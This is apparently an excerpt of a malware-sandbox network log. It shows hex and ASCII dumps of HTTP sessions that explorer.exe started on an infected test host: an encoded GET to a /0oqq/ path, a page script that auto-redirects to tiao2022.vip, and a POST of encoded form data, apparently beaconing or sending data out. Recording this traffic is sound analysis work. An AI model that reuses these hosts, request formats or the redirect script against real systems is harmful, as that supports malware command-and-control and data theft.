30 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61
                                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/css/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" style="stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="transla
                                                                                                                      Mar 20, 2023 09:09:51.639389992 CET250INData Raw: 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: te(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:
                                                                                                                      Mar 20, 2023 09:09:51.639424086 CET251INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33
                                                                                                                      Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.
                                                                                                                      Mar 20, 2023 09:09:51.639451981 CET252INData Raw: 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f
                                                                                                                      Data Ascii: ke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13
                                                                                                                      Mar 20, 2023 09:09:51.639482975 CET254INData Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69
                                                                                                                      Data Ascii: lay:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.1
                                                                                                                      Mar 20, 2023 09:09:51.639513969 CET255INData Raw: 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33
                                                                                                                      Data Ascii: 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.
                                                                                                                      Mar 20, 2023 09:09:51.639605999 CET256INData Raw: 30 37 33 38 20 30 2e 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69
                                                                                                                      Data Ascii: 0738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545"
                                                                                                                      Mar 20, 2023 09:09:51.639632940 CET258INData Raw: 64 3d 22 70 61 74 68 34 35 35 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30
                                                                                                                      Data Ascii: d="path4556" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.
                                                                                                                      Mar 20, 2023 09:09:51.639658928 CET259INData Raw: 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                                                      Data Ascii: 9.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <el
                                                                                                                      Mar 20, 2023 09:09:51.639686108 CET260INData Raw: 33 2e 32 36 31 32 31 20 36 2e 36 31 37 30 32 2c 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a
                                                                                                                      Data Ascii: 3.26121 6.61702,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform
                                                                                                                      Mar 20, 2023 09:09:51.815846920 CET262INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: <path transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.1


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      18192.168.2.349717192.64.116.16280C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:09:54.051496029 CET264OUTGET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=rLgLF68UEZ/jOQpbJtvCh1aTqtb77wkxPt9G2kjS7kCRXhXDnB6LHrmjVzEzts5aMFPYOamRADOx5QsnbVGJmi/5P43wAiKcGg== HTTP/1.1
                                                                                                                      Host: www.gorwly.top
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      Mar 20, 2023 09:09:54.351452112 CET266INHTTP/1.1 404 Not Found
                                                                                                                      Date: Mon, 20 Mar 2023 08:09:54 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 16056
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 6f 70 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 73 74 6f 70 36 30 39 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 6f 66 66 73 65 74 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61
                                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/css/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" style="stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g tra
                                                                                                                      Mar 20, 2023 09:09:54.351516962 CET267INData Raw: 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67
                                                                                                                      Data Ascii: nsform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-op
                                                                                                                      Mar 20, 2023 09:09:54.351568937 CET268INData Raw: 2d 34 31 2e 32 33 31 39 35 33 39 39 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                                                                      Data Ascii: -41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.57
                                                                                                                      Mar 20, 2023 09:09:54.351639986 CET270INData Raw: 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b
                                                                                                                      Data Ascii: ke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.19
                                                                                                                      Mar 20, 2023 09:09:54.351773024 CET271INData Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70
                                                                                                                      Data Ascii: style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.916
                                                                                                                      Mar 20, 2023 09:09:54.351849079 CET272INData Raw: 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30
                                                                                                                      Data Ascii: d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.143
                                                                                                                      Mar 20, 2023 09:09:54.351917028 CET274INData Raw: 33 20 30 2e 37 30 37 30 39 31 2c 35 38 2e 38 30 37 33 38 20 30 2e 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: 3 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                                                                                      Mar 20, 2023 09:09:54.351986885 CET275INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 35 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33
                                                                                                                      Data Ascii: id="path4556" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.9537
                                                                                                                      Mar 20, 2023 09:09:54.352047920 CET276INData Raw: 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                                                                                      Data Ascii: cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                                                                                      Mar 20, 2023 09:09:54.352116108 CET278INData Raw: 37 37 39 36 35 20 36 2e 36 31 37 30 32 2c 2d 33 2e 32 36 31 32 31 20 36 2e 36 31 37 30 32 2c 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30
                                                                                                                      Data Ascii: 77965 6.61702,-3.26121 6.61702,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path
                                                                                                                      Mar 20, 2023 09:09:54.527023077 CET279INData Raw: 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33
                                                                                                                      Data Ascii: -opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      19162.209.159.14280192.168.2.349718C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:10:15.147149086 CET283INHTTP/1.0 200 OK
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=259200
                                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                                      Content-Length: 426
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 74 69 61 6f 32 30 32 32 2e 76 69 70 3a 31 32 33 30 36 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://tiao2022.vip:12306/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
                                                                                                                      Mar 20, 2023 09:10:15.221295118 CET283OUTData Raw: 50
                                                                                                                      Data Ascii: P


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      2192.168.2.349701198.58.118.16780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:08:36.530070066 CET131OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.virginhairweave.co.uk
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 5337
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.virginhairweave.co.uk
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.virginhairweave.co.uk/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 42 66 51 58 64 4a 44 7a 71 49 55 59 63 59 66 54 44 54 68 52 72 58 6b 32 6d 66 6c 69 6c 62 45 6b 47 31 41 32 39 4b 36 63 72 62 33 5f 4f 64 37 71 55 33 31 43 35 4c 4c 65 56 65 54 6f 31 70 72 72 38 55 33 35 6f 38 49 31 6a 5f 4f 46 6b 4c 38 33 57 47 68 37 63 39 63 4d 76 51 4e 4c 4f 6a 68 30 71 6d 28 48 62 6b 4a 75 6f 48 55 33 50 61 74 75 68 4d 57 55 73 45 49 56 47 32 72 74 4e 73 4e 52 63 34 46 53 75 74 63 53 33 51 30 50 41 5f 45 7a 36 53 70 67 4c 5f 79 65 37 36 5a 48 48 71 67 33 4a 6f 4e 6b 68 66 43 72 73 6a 7a 71 51 30 30 35 63 42 62 34 53 4b 79 67 68 6c 43 5a 65 6b 45 48 68 70 61 4a 6e 64 51 30 6b 59 50 6e 6f 53 38 47 34 65 70 4e 35 35 59 65 69 42 56 38 65 78 70 6d 73 4d 6e 34 56 48 31 79 41 45 46 6e 76 38 6e 77 75 46 56 79 43 4c 35 58 64 32 75 4b 53 37 43 44 32 5f 49 53 78 51 66 71 44 49 6f 41 4e 75 57 6a 51 30 79 44 50 45 59 43 4e 51 64 35 74 53 50 4b 56 4c 36 6c 36 4c 46 37 6c 43 31 36 67 47 6e 58 41 4c 58 49 58 7a 37 69 6a 6b 75 48 4a 4c 65 38 61 39 4e 61 37 67 77 50 59 72 36 58 6f 78 45 6c 4d 56 32 77 66 70 6d 43 42 66 41 59 5a 6b 43 63 41 65 56 74 71 44 76 64 76 6f 70 30 4e 41 7a 58 75 52 7e 2d 6e 43 57 4e 39 6e 67 68 65 64 7e 52 4e 46 6b 77 48 33 73 4b 70 4b 30 6d 61 36 4b 37 53 68 67 5a 67 66 61 33 53 72 72 2d 31 32 64 43 59 57 6a 69 39 66 71 58 66 42 63 30 63 35 77 44 46 48 43 56 49 53 55 77 44 78 75 33 37 4c 79 52 58 67 33 64 68 79 36 42 4f 49 7e 50 31 48 50 78 53 55 72 52 50 47 76 67 49 30 77 4a 38 39 6c 6a 4d 31 52 6e 59 78 39 71 71 6c 59 32 55 4c 6d 55 4c 4a 61 52 69 68 6a 66 6c 74 66 74 45 54 78 6b 53 6f 39 34 78 46 66 50 69 4d 78 6f 67 65 28 67 71 5a 31 49 67 34 50 6b 4d 4c 4d 58 46 71 28 4b 4d 43 34 33 74 34 4b 6f 4c 6e 6d 2d 36 47 35 64 7e 67 51 53 44 67 4e 46 73 76 79 64 6d 48 54 42 35 4d 48 41 67 33 53 69 51 75 79 73 6b 35 39 44 74 53 7e 72 35 31 47 35 49 43 61 77 71 54 4a 53 4f 6b 39 6a 79 46 41 7a 73 4a 35 31 42 66 7e 46 54 6e 46 33 79 71 77 6c 73 7a 57 50 34 75 4a 42 66 2d 6b 4d 50 46 59 72 55 43 41 78 67 39 69 68 71 59 6b 48 6a 32 4d 37 4e 44 78 63 4a 63 64 47 63 56 61 48 6b 31 6f 57 61 59 4d 72 51 57 59 31 4d 47 47 62 73 7a 46 30 75 6f 4a 6e 73 74 42 46 71 45 32 41 6e 6f 41 6e 28 42 35 6c 30 4b 68 44 4c 30 62 76 57 58 73 79 41 61 4e 43 75 48 58 62 56 75 31 6d 4a 5a 37 6f 43 68 49 5a 54 5f 73 6e 6b 4d 63 6f 77 78 6e 69 50 52 6e 7a 41 34 61 61 47 58 5a 32 54 6a 68 53 42 31 37 51 46 59 55 39 72 64 67 51 7e 32 44 61 5a 62 6b 70 49 56 4b 72 4f 57 37 79 28 68 6b 47 73 68 7e 52 75 6b 73 63 66 